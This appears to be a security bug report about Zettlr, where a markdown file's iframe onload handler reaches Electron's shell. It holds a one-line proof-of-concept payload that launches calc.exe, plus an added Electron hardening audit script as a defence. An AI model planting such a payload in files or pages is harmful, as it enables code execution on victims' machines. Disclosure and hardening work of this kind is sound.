Cross-site scripting leads to Remote Code Execution #1716
Labels: bug, confirmed, pinned, priority:high, security
Description
XSS leads to remote code execution
Reproducing
Or make the md file yourself. Foo.md content:
<iframe src=x onload="require('electron').shell.openExternal('C:/Windows/System32/calc.exe')"></iframe>
Expected behaviour
XSS payload shouldn't execute
Set nodeIntegration as false
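As an added illustration, not code from this issue or from the Zettlr project, here are the Electron `webPreferences` that let a script injected into rendered HTML reach `require('electron')`, beside the hardened settings that the fix above (nodeIntegration off) points to. The option names (`nodeIntegration`, `contextIsolation`, `sandbox`, `webSecurity`, `nodeIntegrationInSubFrames`) are Electron's own; the `auditWebPreferences` helper and its rule set are assumptions made for this example and are deliberately conservative (a key that is not explicitly set to the safe value is reported).

```javascript
// Weak configuration (constructed for this example): with nodeIntegration on
// and contextIsolation off, any script that runs in the renderer, including
// one injected through rendered markdown, can call require() directly.
const weakWebPreferences = {
  nodeIntegration: true,
  contextIsolation: false,
};

// Hardened configuration: the renderer gets no Node APIs, page scripts are
// isolated from the preload script's JS context, and the renderer process is
// OS-sandboxed. Privileged actions (opening files, shell calls) must instead
// go through a preload script that exposes a small, explicit API.
const hardenedWebPreferences = {
  nodeIntegration: false,
  nodeIntegrationInSubFrames: false,
  contextIsolation: true,
  sandbox: true,
  webSecurity: true,
};

// Hypothetical audit helper: returns a list of findings for a webPreferences
// object. It is conservative: contextIsolation and sandbox must be set to
// true explicitly, rather than relying on Electron's version-dependent
// defaults, for the configuration to pass.
function auditWebPreferences(prefs) {
  const findings = [];
  if (prefs.nodeIntegration === true) {
    findings.push("nodeIntegration is enabled: renderer scripts can require() Node modules");
  }
  if (prefs.nodeIntegrationInSubFrames === true) {
    findings.push("nodeIntegrationInSubFrames is enabled: iframes also get Node access");
  }
  if (prefs.contextIsolation !== true) {
    findings.push("contextIsolation is not explicitly true: page scripts share a context with the preload");
  }
  if (prefs.sandbox !== true) {
    findings.push("sandbox is not explicitly true: renderer runs without the OS sandbox");
  }
  if (prefs.webSecurity === false) {
    findings.push("webSecurity is disabled: same-origin policy is off in the renderer");
  }
  return findings;
}

// Builds the options object you would pass to `new BrowserWindow(...)`.
// Electron is not required here so the file runs under plain Node.
function hardenedWindowOptions(extra = {}) {
  return { ...extra, webPreferences: { ...hardenedWebPreferences } };
}

// Stand-alone run: print the audit of both configurations.
console.log("weak:", auditWebPreferences(weakWebPreferences));
console.log("hardened:", auditWebPreferences(hardenedWindowOptions().webPreferences));
```

With the hardened settings, an injected `onload` handler that calls `require('electron')` fails in the renderer because `require` is not defined there; rendering untrusted markdown still needs HTML sanitisation, but the window configuration removes the path from script execution to the host.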
Platform
Additional information